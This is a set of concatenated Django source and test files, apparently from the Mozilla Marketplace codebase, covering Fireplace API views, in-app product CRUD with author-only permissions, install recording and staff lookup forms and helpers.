__FILENAME__ = test_views
import json
from urlparse import urlparse
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
from mock import patch
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import mkt
from addons.models import AddonUser
from amo.tests import app_factory, ESTestCase, TestCase
from mkt.api.tests import BaseAPI
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.fireplace.serializers import FireplaceAppSerializer
from mkt.search.utils import S
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from mkt.webapps.models import Webapp
from users.models import UserProfile
# Fields present on the regular app serializers that must never appear in
# Fireplace API payloads.
# https://bugzilla.mozilla.org/show_bug.cgi?id=958608#c1 and #c2.
FIREPLACE_EXCLUDED_FIELDS = (
    'absolute_url', 'app_type', 'created', 'default_locale', 'payment_account',
    'regions', 'resource_uri', 'supported_locales', 'tags', 'upsold',
    'versions', 'weekly_downloads')
class TestAppDetail(BaseAPI):
    """Tests for the Fireplace app detail endpoint."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestAppDetail, self).setUp()
        self.url = reverse('fireplace-app-detail', kwargs={'pk': 337141})

    def test_get(self):
        # The payload must contain exactly the whitelisted fields and
        # none of the excluded ones.
        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['id'], 337141)
        for field in FIREPLACE_EXCLUDED_FIELDS:
            ok_(not field in data, field)
        for field in FireplaceAppSerializer.Meta.fields:
            ok_(field in data, field)

    def test_get_slug(self):
        # Lookup by slug resolves to the same app as lookup by pk.
        Webapp.objects.get(pk=337141).update(app_slug='foo')
        res = self.client.get(reverse('fireplace-app-detail',
                                      kwargs={'pk': 'foo'}))
        data = json.loads(res.content)
        eq_(data['id'], 337141)

    def test_others(self):
        # Detail is GET-only; the list endpoint allows no verbs at all.
        url = reverse('fireplace-app-list')
        self._allowed_verbs(self.url, ['get'])
        self._allowed_verbs(url, [])
class TestFeaturedSearchView(RestOAuth, ESTestCase):
    """Tests for the Fireplace featured-search endpoint (search results
    plus collections / featured / operator shelves)."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestFeaturedSearchView, self).setUp()
        self.webapp = Webapp.objects.get(pk=337141)
        collection = Collection.objects.create(name='Hi', description='Mom',
            collection_type=COLLECTIONS_TYPE_BASIC, is_public=True)
        collection.add_app(self.webapp)
        self.reindex(Webapp, 'webapp')
        self.url = reverse('fireplace-featured-search-api')

    def test_get(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        objects = res.json['objects']
        eq_(len(objects), 1)
        data = objects[0]
        eq_(data['id'], 337141)
        # Plain results must honour the Fireplace field whitelist...
        for field in FIREPLACE_EXCLUDED_FIELDS:
            ok_(not field in data, field)
        for field in FireplaceAppSerializer.Meta.fields:
            ok_(field in data, field)
        ok_('collections' in res.json)
        eq_(res.json['collections'][0]['name'], {u'en-US': u'Hi'})
        data = res.json['collections'][0]['apps'][0]
        # ...and so must the apps nested inside collections.
        for field in FIREPLACE_EXCLUDED_FIELDS:
            ok_(not field in data, field)
        for field in FireplaceAppSerializer.Meta.fields:
            ok_(field in data, field)
        ok_('featured' in res.json)
        ok_('operator' in res.json)

    def test_only_64px_icons(self):
        # BaseFireplaceAppSerializer exposes only the 64px icon.
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        objects = res.json['objects']
        data = objects[0]['icons']
        eq_(len(data), 1)
        eq_(urlparse(data['64'])[0:3],
            urlparse(self.webapp.get_icon_url(64))[0:3])
class TestCollectionViewSet(RestOAuth, ESTestCase):
    """Tests for the Fireplace collection detail endpoint, including
    the ES vs. database app-fetching switch (?preview=1)."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestCollectionViewSet, self).setUp()
        self.webapp = Webapp.objects.get(pk=337141)
        collection = Collection.objects.create(name='Hi', description='Mom',
            collection_type=COLLECTIONS_TYPE_BASIC, is_public=True)
        collection.add_app(self.webapp)
        self.reindex(Webapp, 'webapp')
        self.url = reverse('fireplace-collection-detail',
                           kwargs={'pk': collection.pk})

    def test_get(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.json['name'], {u'en-US': u'Hi'})
        data = res.json['apps'][0]
        for field in FIREPLACE_EXCLUDED_FIELDS:
            ok_(not field in data, field)
        for field in FireplaceAppSerializer.Meta.fields:
            ok_(field in data, field)

    @patch('mkt.collections.serializers.CollectionMembershipField.to_native')
    def test_get_preview(self, mock_field_to_native):
        # With ?preview=1 the apps come from the database (QuerySet)...
        mock_field_to_native.return_value = []
        res = self.client.get(self.url, {'preview': 1})
        eq_(res.status_code, 200)
        eq_(res.json['name'], {u'en-US': u'Hi'})
        eq_(res.json['apps'], [])
        eq_(mock_field_to_native.call_count, 1)
        ok_(isinstance(mock_field_to_native.call_args[0][0], QuerySet))
        eq_(mock_field_to_native.call_args[1].get('use_es', False), False)

    @patch('mkt.collections.serializers.CollectionMembershipField.to_native')
    def test_no_get_preview(self, mock_field_to_native):
        # ...and without it they come from Elasticsearch (S).
        mock_field_to_native.return_value = []
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.json['name'], {u'en-US': u'Hi'})
        eq_(res.json['apps'], [])
        eq_(mock_field_to_native.call_count, 1)
        ok_(isinstance(mock_field_to_native.call_args[0][0], S))
        eq_(mock_field_to_native.call_args[1].get('use_es', False), True)
class TestSearchView(RestOAuth, ESTestCase):
    """Tests for the plain Fireplace search endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestSearchView, self).setUp()
        self.webapp = Webapp.objects.get(pk=337141)
        self.reindex(Webapp, 'webapp')
        self.url = reverse('fireplace-search-api')

    def test_get(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        objects = res.json['objects']
        eq_(len(objects), 1)
        data = objects[0]
        eq_(data['id'], 337141)
        for field in FIREPLACE_EXCLUDED_FIELDS:
            ok_(not field in data, field)
        for field in FireplaceAppSerializer.Meta.fields:
            ok_(field in data, field)
        # Unlike featured search, no extra shelves are included.
        ok_(not 'featured' in res.json)
        ok_(not 'collections' in res.json)
        ok_(not 'operator' in res.json)

    def test_anonymous_user(self):
        # Search never includes per-user data -- even when authenticated
        # -- so responses stay fully cacheable.
        res = self.anon.get(self.url)
        eq_(res.status_code, 200)
        data = res.json['objects'][0]
        eq_(data['user'], None)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        data = res.json['objects'][0]
        eq_(data['user'], None)
class TestConsumerInfoView(RestOAuth, TestCase):
    """Tests for the consumer-info endpoint: region plus, for logged-in
    users, their installed/developed/purchased app ids."""
    fixtures = fixture('user_2519')

    def setUp(self):
        super(TestConsumerInfoView, self).setUp()
        # NOTE(review): self.request appears unused by these tests.
        self.request = RequestFactory().get('/')
        self.url = reverse('fireplace-consumer-info')
        self.user = UserProfile.objects.get(pk=2519)

    @patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_no_user_just_region(self, region_from_request):
        region_from_request.return_value = mkt.regions.UK
        res = self.anon.get(self.url)
        data = json.loads(res.content)
        eq_(data['region'], 'uk')
        # Anonymous responses carry no per-user app data.
        ok_(not 'apps' in data)

    @patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_with_user_developed(self, region_from_request):
        region_from_request.return_value = mkt.regions.BR
        developed_app = app_factory()
        AddonUser.objects.create(user=self.user, addon=developed_app)
        self.client.login(username=self.user.email, password='password')
        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['region'], 'br')
        eq_(data['apps']['installed'], [])
        eq_(data['apps']['developed'], [developed_app.pk])
        eq_(data['apps']['purchased'], [])

    @patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_with_user_installed(self, region_from_request):
        region_from_request.return_value = mkt.regions.BR
        installed_app = app_factory()
        Installed.objects.create(user=self.user, addon=installed_app)
        self.client.login(username=self.user.email, password='password')
        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['region'], 'br')
        eq_(data['apps']['installed'], [installed_app.pk])
        eq_(data['apps']['developed'], [])
        eq_(data['apps']['purchased'], [])

    @patch('users.models.UserProfile.purchase_ids')
    @patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_with_user_purchased(self, region_from_request, purchase_ids):
        region_from_request.return_value = mkt.regions.BR
        purchased_app = app_factory()
        purchase_ids.return_value = [purchased_app.pk]
        self.client.login(username=self.user.email, password='password')
        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['region'], 'br')
        eq_(data['apps']['installed'], [])
        eq_(data['apps']['developed'], [])
        eq_(data['apps']['purchased'], [purchased_app.pk])
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.fireplace.views import (AppViewSet, CollectionViewSet,
ConsumerInfoView, FeaturedSearchView, SearchView)
# Routers for the viewset-based endpoints.
apps = SimpleRouter()
apps.register(r'app', AppViewSet, base_name='fireplace-app')

collections = SimpleRouter()
collections.register(r'collection', CollectionViewSet,
                     base_name='fireplace-collection')

# Every Fireplace endpoint lives under the /fireplace/ prefix.
urlpatterns = patterns('',
    url(r'^fireplace/', include(apps.urls)),
    url(r'^fireplace/', include(collections.urls)),
    url(r'^fireplace/consumer-info/',
        ConsumerInfoView.as_view(),
        name='fireplace-consumer-info'),
    url(r'^fireplace/search/featured/',
        FeaturedSearchView.as_view(),
        name='fireplace-featured-search-api'),
    url(r'^fireplace/search/',
        SearchView.as_view(),
        name='fireplace-search-api'),
)
########NEW FILE########
__FILENAME__ = views
import json
from django.http import HttpResponse
from rest_framework.generics import RetrieveAPIView
from rest_framework.permissions import AllowAny
from mkt.account.views import user_relevant_apps
from mkt.api.base import CORSMixin
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.collections.views import CollectionViewSet as BaseCollectionViewSet
from mkt.fireplace.serializers import (FireplaceCollectionSerializer, FireplaceAppSerializer,
FireplaceESAppSerializer)
from mkt.search.views import (FeaturedSearchView as BaseFeaturedSearchView,
SearchView as BaseSearchView)
from mkt.webapps.views import AppViewSet as BaseAppViewset
class CollectionViewSet(BaseCollectionViewSet):
    """Fireplace-flavoured collection endpoints."""
    serializer_class = FireplaceCollectionSerializer

    def get_serializer_context(self):
        """Context passed to the serializer. Since we are in Fireplace,
        apps are always fetched through ES, except when a preview is
        explicitly requested via ?preview=."""
        ctx = super(CollectionViewSet, self).get_serializer_context()
        preview_requested = bool(self.request.GET.get('preview'))
        ctx['use-es-for-apps'] = not preview_requested
        return ctx
class AppViewSet(BaseAppViewset):
    """App endpoints serialized with the Fireplace field whitelist."""
    serializer_class = FireplaceAppSerializer
class FeaturedSearchView(BaseFeaturedSearchView):
    """Featured search with Fireplace serializers. No authentication
    classes: responses are anonymous to stay cacheable."""
    serializer_class = FireplaceESAppSerializer
    collections_serializer_class = FireplaceCollectionSerializer
    authentication_classes = []
class SearchView(BaseSearchView):
    """Plain search serialized with the Fireplace ES serializer."""
    serializer_class = FireplaceESAppSerializer
class ConsumerInfoView(CORSMixin, RetrieveAPIView):
    """Tiny endpoint giving Fireplace the request's region and, for
    authenticated users, the ids of their relevant apps."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    cors_allowed_methods = ['get']
    permission_classes = (AllowAny,)

    def retrieve(self, request, *args, **kwargs):
        info = {'region': request.REGION.slug}
        user = request.amo_user
        if user:
            info['apps'] = user_relevant_apps(user)

        # Return an HttpResponse directly to be as fast as possible.
        return HttpResponse(json.dumps(info),
                            content_type='application/json; charset=utf-8')
########NEW FILE########
__FILENAME__ = models
from django.core.urlresolvers import reverse
from django.db import models
from amo.models import ModelBase
from apps.translations.fields import save_signal, TranslatedField
from mkt.prices.models import Price
class InAppProduct(ModelBase):
    """
    An item which is purchaseable from within a marketplace app.
    """
    # The app this product belongs to.
    webapp = models.ForeignKey('webapps.WebApp')
    # Price tier the product is sold at.
    price = models.ForeignKey(Price)
    # Display name; require_locale=False accepts a bare string.
    name = TranslatedField(require_locale=False)
    # Optional product logo; icon_url falls back to the app icon.
    logo_url = models.URLField(max_length=1024, null=True, blank=True)

    class Meta:
        db_table = 'inapp_products'

    def __unicode__(self):
        return u'%s: %s' % (self.webapp.name, self.name)

    @property
    def icon_url(self):
        # Prefer the product's own logo, else the app's 64px icon.
        return self.logo_url or self.webapp.get_icon_url(64)

    @property
    def buy_url(self):
        # FIXME: This should accept the id in the url instead of from JSON.
        return reverse('webpay-prepare-inapp')
# Persist the translated `name` field whenever a product is saved.
models.signals.pre_save.connect(save_signal, sender=InAppProduct,
                                dispatch_uid='inapp_products_translations')
########NEW FILE########
__FILENAME__ = serializers
from django import forms
from rest_framework import serializers
from mkt.api.forms import SchemeURLValidator as URLValidator
from mkt.inapp.models import InAppProduct
class InAppProductSerializer(serializers.ModelSerializer):
    """API serializer for in-app products."""
    id = serializers.IntegerField(read_only=True)
    # The parent app is exposed by slug and read-only: the view always
    # takes the app from the URL, never from the payload.
    app = serializers.SlugRelatedField(read_only=True, slug_field='app_slug',
                                       source='webapp')
    price_id = serializers.PrimaryKeyRelatedField(source='price')
    name = serializers.CharField()
    # Optional; only http(s) logo URLs are accepted.
    logo_url = serializers.CharField(
        validators=[URLValidator(schemes=['http', 'https'])],
        required=False)

    class Meta:
        model = InAppProduct
        fields = ['id', 'app', 'price_id', 'name', 'logo_url']
class InAppProductForm(forms.ModelForm):
    """Minimal form for editing an in-app product's price tier."""
    class Meta:
        model = InAppProduct
        fields = ['price',]
########NEW FILE########
__FILENAME__ = test_serializers
from nose.tools import eq_, ok_
import amo.tests
from mkt.inapp.serializers import InAppProductSerializer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
class TestInAppProductSerializer(amo.tests.TestCase):
    """Validation tests for InAppProductSerializer."""
    fixtures = fixture('webapp_337141', 'prices')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)
        price = Price.objects.all()[0]
        self.valid_product_data = {
            'name': 'Purple Gems',
            'logo_url': 'https://marketplace.firefox.com/rocket.png',
            'price_id': price.id,
        }

    def test_valid(self):
        serializer = InAppProductSerializer(data=self.valid_product_data)
        ok_(serializer.is_valid())

    def test_no_logo_url(self):
        # logo_url is optional.
        product_data = dict(self.valid_product_data)
        del product_data['logo_url']
        serializer = InAppProductSerializer(data=product_data)
        ok_(serializer.is_valid())

    def test_create_ftp_scheme(self):
        # Only http/https logo URLs pass validation.
        product_data = dict(self.valid_product_data)
        product_data['logo_url'] = 'ftp://example.com/awesome.png'
        serializer = InAppProductSerializer(data=product_data)
        ok_(not serializer.is_valid())
        eq_(serializer.errors['logo_url'],
            ['Scheme should be one of http, https.'])
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from nose.tools import eq_
from rest_framework import status
import amo.tests
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuthClient
from mkt.api.models import Access, generate
from mkt.inapp.models import InAppProduct
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
class BaseInAppProductViewSetTests(amo.tests.TestCase):
    """Shared fixtures and helpers for the in-app product API tests."""

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)
        price = Price.objects.all()[0]
        self.valid_in_app_product_data = {
            'name': 'Purple Gems',
            'logo_url': 'https://marketplace.firefox.com/rocket.png',
            'price_id': price.id,
        }

    def setup_client(self, user):
        # Build an OAuth client authenticated as the given user.
        access = Access.objects.create(key='test_oauth_key_owner',
                                       secret=generate(), user=user)
        return RestOAuthClient(access)

    def list_url(self):
        return reverse('in-app-products-list',
                       kwargs={'app_slug': self.webapp.app_slug})

    def detail_url(self, pk):
        app_slug = self.webapp.app_slug
        return reverse('in-app-products-detail',
                       kwargs={'app_slug': app_slug, 'pk': pk})

    def create_product(self):
        # Create a product directly in the DB, bypassing the API.
        product_data = {'webapp': self.webapp}
        product_data.update(self.valid_in_app_product_data)
        return InAppProduct.objects.create(**product_data)

    # Thin JSON request helpers around the authenticated client.
    def get(self, url):
        return self.client.get(url)

    def post(self, url, data):
        return self.client.post(url, json.dumps(data),
                                content_type='application/json')

    def put(self, url, data):
        return self.client.put(url, json.dumps(data),
                               content_type='application/json')

    def delete(self, url):
        return self.client.delete(url)
class TestInAppProductViewSetAuthorized(BaseInAppProductViewSetTests):
    """The app's author can create/update/list/retrieve products, but
    never delete them."""
    fixtures = fixture('webapp_337141', 'prices')

    def setUp(self):
        super(TestInAppProductViewSetAuthorized, self).setUp()
        # Authenticate as one of the app's authors.
        user = self.webapp.authors.all()[0]
        self.client = self.setup_client(user)

    def test_create(self):
        response = self.post(self.list_url(), self.valid_in_app_product_data)
        eq_(response.status_code, status.HTTP_201_CREATED)
        eq_(response.json['name'], 'Purple Gems')

    def test_update(self):
        product = self.create_product()
        self.valid_in_app_product_data['name'] = 'Orange Gems'
        response = self.put(self.detail_url(product.id),
                            self.valid_in_app_product_data)
        eq_(response.status_code, status.HTTP_200_OK)
        eq_(response.json['name'], 'Orange Gems')
        eq_(response.json['name'], product.reload().name)

    def test_list(self):
        product1 = self.create_product()
        product2 = self.create_product()
        response = self.get(self.list_url())
        eq_(response.status_code, status.HTTP_200_OK)
        eq_(sorted([p['id'] for p in response.json['objects']]),
            [product1.id, product2.id])

    def test_detail(self):
        product = self.create_product()
        response = self.get(self.detail_url(product.id))
        eq_(response.status_code, status.HTTP_200_OK)
        eq_(response.json['id'], product.id)

    def test_delete(self):
        # DELETE is forbidden even for the author.
        product = self.create_product()
        delete_response = self.delete(self.detail_url(product.id))
        eq_(delete_response.status_code, status.HTTP_403_FORBIDDEN)
class TestInAppProductViewSetUnauthorized(BaseInAppProductViewSetTests):
    """A user who is not an author of the app gets 403 on every verb."""
    fixtures = fixture('user_999', 'webapp_337141', 'prices')

    def setUp(self):
        super(TestInAppProductViewSetUnauthorized, self).setUp()
        # Authenticate as a user unrelated to the app.
        user = UserProfile.objects.get(id=999)
        self.client = self.setup_client(user)

    def test_create(self):
        response = self.post(self.list_url(),
                             self.valid_in_app_product_data)
        eq_(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_update(self):
        product = self.create_product()
        self.valid_in_app_product_data['name'] = 'Orange Gems'
        response = self.put(self.detail_url(product.id),
                            self.valid_in_app_product_data)
        eq_(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_list(self):
        self.create_product()
        response = self.get(self.list_url())
        eq_(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_detail(self):
        product = self.create_product()
        response = self.get(self.detail_url(product.id))
        eq_(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_delete(self):
        product = self.create_product()
        response = self.delete(self.detail_url(product.id))
        eq_(response.status_code, status.HTTP_403_FORBIDDEN)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import get_object_or_404
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import ModelViewSet
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAuthor, ByHttpMethod
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.inapp.models import InAppProduct
from mkt.inapp.serializers import InAppProductSerializer
from mkt.webapps.models import Webapp
class InAppProductViewSet(CORSMixin, MarketplaceView, ModelViewSet):
    """CRUD API for in-app products, scoped to a parent app by slug.

    Deletion is deliberately unsupported: `ByHttpMethod` has no entry
    for 'delete', so DELETE requests are rejected with 403 before ever
    reaching `destroy()`.
    """
    serializer_class = InAppProductSerializer
    cors_allowed_methods = ('get', 'post', 'put', 'delete')
    permission_classes = [ByHttpMethod({
        'options': AllowAny,  # Needed for CORS.
        'get': AllowAuthor,
        'post': AllowAuthor,
        'put': AllowAuthor,
    })]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]

    def destroy(self, request, *args, **kwargs):
        # Match ModelViewSet.destroy()'s signature so a dispatched DELETE
        # would not die with a TypeError before reaching this body, and
        # raise NotImplementedError: the original `raise NotImplemented(...)`
        # tried to call the NotImplemented constant, which is not an
        # exception and itself raises a confusing TypeError.
        raise NotImplementedError('destroy is not allowed')

    def pre_save(self, in_app_product):
        # Always attach the product to the app named in the URL.
        in_app_product.webapp = self.get_app()

    def get_queryset(self):
        # Only expose products belonging to the app in the URL.
        return InAppProduct.objects.filter(webapp=self.get_app())

    def get_app(self):
        # Cache the app lookup for the duration of the request.
        if not hasattr(self, 'app'):
            app_slug = self.kwargs['app_slug']
            self.app = get_object_or_404(Webapp, app_slug=app_slug)
        return self.app

    def get_authors(self):
        # Used by the AllowAuthor permission to decide access.
        return self.get_app().authors.all()
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from mkt.api.forms import SluggableModelChoiceField
from mkt.webapps.models import Webapp
class InstallForm(happyforms.Form):
    """Validates an install request; `app` accepts either a pk or a
    slug via SluggableModelChoiceField."""
    app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
                                    sluggable_to_field_name='app_slug')

    def __init__(self, *args, **kwargs):
        # The view always passes the request through.
        self.request = kwargs.pop('request')
        super(InstallForm, self).__init__(*args, **kwargs)

    def clean_app(self):
        app = self.cleaned_data['app']
        # Paid apps must go through the receipt flow instead.
        if app.is_premium():
            raise forms.ValidationError('Use the receipt API for paid apps.')
        return app
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from mock import ANY, patch
from nose.tools import eq_
import amo
from addons.models import Addon, AddonUser
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from mkt.constants.apps import INSTALL_TYPE_DEVELOPER, INSTALL_TYPE_USER
class TestAPI(RestOAuth):
    """Tests for the install-recording endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestAPI, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        self.url = reverse('app-install-list')
        self.data = json.dumps({'app': self.addon.pk})
        self.profile = self.user

    def test_has_cors(self):
        self.assertCORS(self.client.post(self.url), 'post')

    def post(self, anon=False):
        # Post self.data either anonymously or authenticated.
        client = self.anon if anon else self.client
        return client.post(self.url, data=self.data)

    def test_no_app(self):
        self.data = json.dumps({'app': 0})
        eq_(self.post().status_code, 400)

    def test_not_public(self):
        # Plain users can't install non-public apps.
        self.addon.update(status=amo.STATUS_DISABLED)
        self.data = json.dumps({'app': self.addon.app_slug})
        eq_(self.post().status_code, 403)

    def test_not_paid(self):
        # Paid apps must use the receipt API.
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.data = json.dumps({'app': self.addon.app_slug})
        eq_(self.post().status_code, 400)

    def test_app_slug(self):
        self.data = json.dumps({'app': self.addon.app_slug})
        eq_(self.post().status_code, 201)
        eq_(self.profile.reload().installed_set.all()[0].addon, self.addon)

    def test_app_pk(self):
        self.data = json.dumps({'app': self.addon.pk})
        eq_(self.post().status_code, 201)
        eq_(self.profile.reload().installed_set.all()[0].addon, self.addon)

    @patch('mkt.installs.utils.record_action')
    def test_logged(self, record_action):
        self.data = json.dumps({'app': self.addon.pk})
        eq_(self.post().status_code, 201)
        record_action.assert_called_with('install', ANY,
            {'app-domain': u'http://micropipes.com', 'app-id': 337141L,
             'region': 'restofworld', 'anonymous': False})

    @patch('mkt.installs.utils.record_action')
    def test_logged_anon(self, record_action):
        # Anonymous installs are still recorded in metrics.
        self.data = json.dumps({'app': self.addon.pk})
        eq_(self.post(anon=True).status_code, 201)
        record_action.assert_called_with('install', ANY,
            {'app-domain': u'http://micropipes.com', 'app-id': 337141L,
             'region': 'restofworld', 'anonymous': True})

    @patch('mkt.installs.utils.record_action')
    def test_app_install_twice(self, record_action):
        # A repeat install is accepted but answered with 202.
        Installed.objects.create(user=self.profile, addon=self.addon,
                                 install_type=INSTALL_TYPE_USER)
        eq_(self.post().status_code, 202)

    def test_app_install_developer(self):
        AddonUser.objects.create(addon=self.addon, user=self.profile)
        self.data = json.dumps({'app': self.addon.app_slug})
        eq_(self.post().status_code, 201)
        eq_(self.profile.reload().installed_set.all()[0].install_type,
            INSTALL_TYPE_DEVELOPER)

    def test_app_install_developer_not_public(self):
        # Developers may install their own non-public app.
        self.addon.update(status=amo.STATUS_DISABLED)
        self.test_app_install_developer()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.installs.views import install
# Single endpoint: POST an app id/slug to record an install.
urlpatterns = patterns('',
    url(r'^installs/record/', install, name='app-install-list')
)
########NEW FILE########
__FILENAME__ = utils
import amo
from access.acl import check_ownership
from lib.metrics import record_action
from mkt.constants.apps import INSTALL_TYPE_DEVELOPER, INSTALL_TYPE_USER
def install_type(request, app):
    """Classify an install: owners/developers of the app (even when it
    is disabled) get INSTALL_TYPE_DEVELOPER, everyone else
    INSTALL_TYPE_USER."""
    is_developer = check_ownership(request, app, require_owner=False,
                                   ignore_disabled=True, admin=False)
    return INSTALL_TYPE_DEVELOPER if is_developer else INSTALL_TYPE_USER
def record(request, app):
    """Record an install both in the activity log and in metrics."""
    amo.log(amo.LOG.INSTALL_ADDON, app)
    metrics_data = {
        'app-domain': app.domain_from_url(app.origin, allow_none=True),
        'app-id': app.pk,
        'region': request.REGION.slug,
        'anonymous': request.user.is_anonymous(),
    }
    record_action('install', request, metrics_data)
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import PermissionDenied
import commonware.log
from rest_framework.decorators import (authentication_classes,
parser_classes, permission_classes)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import cors_api_view
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.installs.forms import InstallForm
from mkt.installs.utils import install_type, record
from mkt.webapps.models import Installed
log = commonware.log.getLogger('z.api')
@cors_api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
                         RestSharedSecretAuthentication])
@parser_classes([JSONParser, FormParser])
@permission_classes([AllowAny])
def install(request):
    """Record an app install.

    Responses: 201 for a new install, 202 when the user had already
    installed the app, 400 on form errors, and 403 (PermissionDenied)
    when a plain user targets a non-public app.
    """
    form = InstallForm(request.DATA, request=request)
    if form.is_valid():
        app = form.cleaned_data['app']
        type_ = install_type(request, app)
        # Users can't install non-public apps. Developers can though.
        if not app.is_public() and type_ == INSTALL_TYPE_USER:
            log.info('App not public: {0}'.format(app.pk))
            raise PermissionDenied

        if not request.amo_user:
            # Anonymous installs only hit the metrics pipeline, no
            # Installed row is created.
            record(request, app)
        else:
            installed, created = Installed.objects.get_or_create(
                addon=app, user=request.amo_user, install_type=type_)
            record(request, app)
            if not created:
                return Response(status=202)
        return Response(status=201)
    return Response(status=400)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
import happyforms
from tower import ugettext_lazy as _lazy
class TransactionSearchForm(happyforms.Form):
    """Single-field transaction lookup form."""
    q = forms.CharField(label=_lazy(u'Transaction Lookup'))
    # NOTE(review): Django reads label_suffix from __init__ kwargs, not
    # from a class attribute, so this line may have no effect -- confirm.
    label_suffix = ''
class TransactionRefundForm(happyforms.Form):
    """Refund form; the `fake` status selector only exists when fake
    refunds are enabled via settings.BANGO_FAKE_REFUNDS."""
    # A manual refund is one that does not use the payment providers API
    # but has been processed manually.
    manual = forms.BooleanField(
        label=_lazy(u'Process a manual refund'),
        required=False)
    refund_reason = forms.CharField(
        label=_lazy(u'Enter refund details to refund transaction'),
        widget=forms.Textarea(attrs={'rows': 4}))
    fake = forms.ChoiceField(
        choices=(('OK', 'OK'), ('PENDING', 'Pending'), ('INVALID', 'Invalid')))

    def __init__(self, *args, **kw):
        super(TransactionRefundForm, self).__init__(*args, **kw)
        # Drop the fake-status selector unless fake refunds are enabled.
        if not settings.BANGO_FAKE_REFUNDS:
            del self.fields['fake']
class DeleteUserForm(happyforms.Form):
    """Requires a written justification before deleting a user."""
    delete_reason = forms.CharField(
        label=_lazy(u'Reason for Deletion'),
        widget=forms.Textarea(attrs={'rows': 2}))
########NEW FILE########
__FILENAME__ = helpers
from jingo import env, register
import jinja2
from access import acl
@register.filter
@jinja2.contextfilter
def format_currencies(context, currencies):
    """Render a {currency code: amount} mapping as e.g.
    '(USD 10.00, EUR 5.00)'. Non-positive amounts are skipped; when
    nothing remains, an empty string is returned."""
    positive = ['%s %.2f' % (code, amount)
                for code, amount in currencies.items()
                if amount > 0.0]
    rendered = ', '.join(positive)
    if rendered:
        rendered = '(%s)' % rendered
    return jinja2.Markup(rendered)
# page_type is used for setting the link 'sel' class (activity/purchases)
@register.function
def user_header(account, title, is_admin=False, page_type=''):
    """Render the lookup user-header template for the given account."""
    t = env.get_template('lookup/helpers/user_header.html')
    return jinja2.Markup(t.render({'account': account, 'is_admin': is_admin,
                                   'title': title, 'page_type': page_type}))
# page_type is used for setting the link 'sel' class
@register.function
@jinja2.contextfunction
def app_header(context, app, page_type=''):
    """Render the lookup app header, exposing the current user's roles
    (author/operator/admin/staff/reviewer) to the template."""
    t = env.get_template('lookup/helpers/app_header.html')
    is_author = acl.check_ownership(context['request'], app)
    is_operator = any(g.name == 'Operators' for g in context['request'].groups)
    is_admin = acl.action_allowed(context['request'], 'Users', 'Edit')
    is_staff = acl.action_allowed(context['request'], 'Apps', 'Configure')
    is_reviewer = acl.check_reviewer(context['request'])
    return jinja2.Markup(t.render({'app': app, 'page_type': page_type,
                                   'is_admin': is_admin, 'is_staff': is_staff,
                                   'is_reviewer': is_reviewer,
                                   'is_author': is_author,
                                   'is_operator': is_operator}))
